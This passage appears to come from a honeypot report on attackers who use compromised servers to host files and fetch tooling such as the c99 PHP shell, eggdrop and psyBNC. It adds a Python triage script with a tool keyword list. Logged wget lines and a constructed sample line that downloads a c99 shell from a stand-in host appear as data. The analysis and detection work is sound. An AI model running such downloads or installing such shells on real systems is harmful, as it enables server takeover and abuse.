Hosting Files

Attackers made multiple attempts to download files that appeared to be intended only for hosting on the server. In one very specific attack, the attacker used over 50 commands to investigate the server and then attempted to download several files. The following shows one attempt to download a music file and two attempts to download legitimate Windows applications (not related to cracking activities):

10.10.60.66 wget http://censored.fr/explorer/AngelsAndAirwaves/Mp3z-It_Hurts.bkn.mp3
10.10.60.66 wget http://censored.com/support/files/webdwarf.exe
10.10.138.108 wget http://censored.br/ftp/Instala_MasterCaixa.exe

Other files that attackers attempted to download seemed to be intended to help in the exploitation of the server. A common action was to fetch a PHP shell application such as c99 shell (see Appendix B) to allow the attacker to issue shell commands, view the filesystem and perhaps to connect to local databases. Some attackers tried to download the eggdrop IRC bot or the psyBNC IRC proxy.
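
The following is an added example, not part of the original text: a small triage script that reads captured commands in the `source-IP command` form shown above and separates hosting-style downloads from attempts to fetch exploitation tooling. The keyword and extension lists, the `example.invalid` URLs and the last three sample lines are assumptions made for the illustration.

```python
import re
from collections import defaultdict
from posixpath import basename
from urllib.parse import urlparse

# Assumed lists for this example, based on the tools and file types named above.
TOOL_KEYWORDS = ("c99", "eggdrop", "psybnc")
HOSTING_EXTS = (".mp3", ".exe")
LINE_RE = re.compile(r"^(?P<src>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<cmd>.+)$")

def wget_urls(cmd):
    """Return the URL arguments of a wget command, skipping option flags."""
    tokens = cmd.split()
    if not tokens or tokens[0] != "wget":
        return []
    return [t for t in tokens[1:] if t.lower().startswith(("http://", "https://", "ftp://"))]

def classify(url):
    """Label a download 'tooling', 'hosting' or 'unknown' from its file name."""
    name = basename(urlparse(url).path).lower()
    if any(k in name for k in TOOL_KEYWORDS):
        return "tooling"
    if name.endswith(HOSTING_EXTS):
        return "hosting"
    return "unknown"

def triage(lines):
    """Map each source IP to the (category, url) pairs of its wget attempts."""
    report = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            for url in wget_urls(m["cmd"]):
                report[m["src"]].append((classify(url), url))
    return dict(report)

# First three lines are from the text above; the last three are constructed.
SAMPLE = [
    "10.10.60.66 wget http://censored.fr/explorer/AngelsAndAirwaves/Mp3z-It_Hurts.bkn.mp3",
    "10.10.60.66 wget http://censored.com/support/files/webdwarf.exe",
    "10.10.138.108 wget http://censored.br/ftp/Instala_MasterCaixa.exe",
    "10.10.7.21 wget -q http://example.invalid/tools/c99.txt",
    "10.10.7.21 wget http://example.invalid/psyBNC.tar.gz",
    "10.10.7.21 uname -a",
]

if __name__ == "__main__":
    for src, hits in triage(SAMPLE).items():
        print(src, [category for category, _ in hits])
```

File-name matching is only a first-pass sort; a renamed shell lands in `unknown`, so those entries still need review of the retrieved content.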